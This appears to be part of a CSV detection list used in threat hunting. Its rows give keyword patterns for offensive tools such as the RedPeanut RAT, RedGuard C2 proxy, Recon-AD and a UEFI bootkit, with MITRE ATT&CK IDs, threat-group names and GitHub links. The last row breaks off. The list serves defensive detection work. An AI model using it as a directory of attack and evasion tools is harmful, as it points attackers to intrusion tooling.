+"*Recon-AD-Domain*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z"
+"*Recon-AD-LocalGroups*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z"
+"*Recon-AD-SPNs*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z"
+"*Recon-AD-Users.*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*recon-archy analyse*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon-archy build*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon-archy crawl*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon-archy-master*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*ReconUserGroupRoles.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*RecycledInjector.exe*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*RecycledInjector-main*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*RecycledInjector-main*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*RED_HAWK*","offensive_tool_keyword","red_hawk","Vulnerability Scanning and Crawling. A must have tool for all penetration testers.","T1190 - T1059 - T1595","TA0001 - TA0009","N/A","N/A","Information Gathering","https://github.com/Tuhinshubhra/RED_HAWK","1","0","N/A","N/A","10","2612","837","2022-05-31T12:08:19Z","2017-06-11T05:02:35Z" +"*Red-Baron*","offensive_tool_keyword","Red-Baron","Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient. disposable. 
secure and agile infrastructure for Red Teams.","T1583 - T1078 - T1027 - T1135","TA0002 - TA0003 - TA0040","N/A","N/A","Frameworks","https://github.com/byt3bl33d3r/Red-Baron","1","0","N/A","N/A","4","362","72","2020-03-05T07:19:43Z","2018-08-23T18:25:07Z" +"*redelk_backend_name_c2*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*redelk_backend_name_decoy*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*RedGuard.log*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*RedGuard/core*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*RedGuard_x64.exe*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*RedGuard_x86.exe*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda 
- Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*redhuntlabs*","offensive_tool_keyword","redhuntlabs","documentation for offensive operation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/redhuntlabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*redhuntlabs/BucketLoot*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*RedHunt-OS*","offensive_tool_keyword","RedHunt-OS","Virtual Machine for Adversary Emulation and Threat Hunting by RedHunt Labs RedHunt OS aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attackers arsenal as well as defenders toolkit to actively identify the threats in your environment","T1583 - T1057 - T1016","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/redhuntlabs/RedHunt-OS","1","1","N/A","N/A","10","1170","185","2020-07-13T04:54:49Z","2018-03-14T19:31:16Z" +"*redis-rce*","offensive_tool_keyword","redis-rce","A exploit for Redis 4.x/5.x RCE. 
inspired by Redis post-exploitation.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Ridter/redis-rce","1","0","N/A","N/A","9","856","216","2021-11-30T14:55:59Z","2019-07-08T14:05:30Z" +"*redlotus.efi*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*RedPeanut Smb server started*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanut.Models*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*redpeanut.pfx*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanut.Resources.*.txt","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - 
T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanut.Utility*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutAgent.C2*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutAgent.Core*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutAgent.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutAgent.Evasion*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutAgent.Execution*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutAgent.Program*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutC2*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutCLI*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutDBContext*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutDBInitializer*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutHtaPowerShellScript*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutHtaScript.hta*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutInstallUtil.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutMigrate.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutMSBuildScript.xml*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutPowershellScriptS*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutRP.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 